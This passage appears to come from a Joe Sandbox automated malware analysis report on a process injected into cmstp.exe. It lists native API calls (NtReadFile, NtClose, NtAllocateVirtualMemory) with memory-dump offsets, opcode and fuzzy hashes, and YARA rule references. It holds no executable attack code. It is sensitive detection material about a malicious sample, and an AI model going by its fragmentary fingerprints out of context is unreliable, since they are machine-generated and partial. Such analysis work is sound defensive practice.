                                          control_flow_graph 291 aa3d0-aa419 call aaf20 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !J
                                          • API String ID: 2738559852-747486036
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: a30247ae5ba33b1ed46b3f08e5375f1f8ac4613c94c5868431253226c49408ff
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 11F0A4B2200208AFCB18DF89DC81EEB77ADAF8C754F158258BA1D97241D630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA3CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 295 aa3ca-aa3cb 296 aa3da-aa419 call aaf20 NtReadFile 295->296 297 aa3cd-aa3ce 295->297 297->296
                                          APIs
                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !J
                                          • API String ID: 2738559852-747486036
                                          • Opcode ID: 2e2145ff2e341c1d8fca080a0d299258ad6bca4f6bb3881c450b2421b126617c
                                          • Instruction ID: 658f4992cd855cc1aecd724bee42a0b44c2ec61aa739e9793aa49a8dd6c95622
                                          • Opcode Fuzzy Hash: 2e2145ff2e341c1d8fca080a0d299258ad6bca4f6bb3881c450b2421b126617c
                                          • Instruction Fuzzy Hash: BCF0F8B2600108AFDB04DF99DC84EEB73ADEF8D714F158619FA0DA3241D630E815CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA44A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 306 aa44a-aa479 call aaf20 NtClose
                                          APIs
                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID: @M
                                          • API String ID: 3535843008-718900356
                                          • Opcode ID: 79f3a0b871518812defec16c576ec8ac01da623b4bb3b9cf6db8bc9c69869ffc
                                          • Instruction ID: dcce2112a703cca207136a537f5cd14ec8c8c72acacc687d4726c96d1a48fd7e
                                          • Opcode Fuzzy Hash: 79f3a0b871518812defec16c576ec8ac01da623b4bb3b9cf6db8bc9c69869ffc
                                          • Instruction Fuzzy Hash: 6BE08C76200204AFDB20EFA4DC85FD77B28EF49320F104068BA1C9B242D630AA008A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA450 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 aa450-aa466 310 aa46c-aa479 NtClose 309->310 311 aa467 call aaf20 309->311 311->310
                                          APIs
                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID: @M
                                          • API String ID: 3535843008-718900356
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 9f48a1c1a4170332db2fcbc85ac7d7b48469cb6b1b0d140592c5c70c00ac018c
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 14D01776200214ABD714EBD8DC85FE77BACEF49760F1544A9BA189B282D630FA0086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA539
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: f52b4377ada8f1ad56c86a480284727d5bc631dace762f40d7406ab6d5ae597f
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 6AF015B2200208AFCB18DF89DC81EEB77ADAF88754F118158BE0897241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EC00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EC07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBF900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
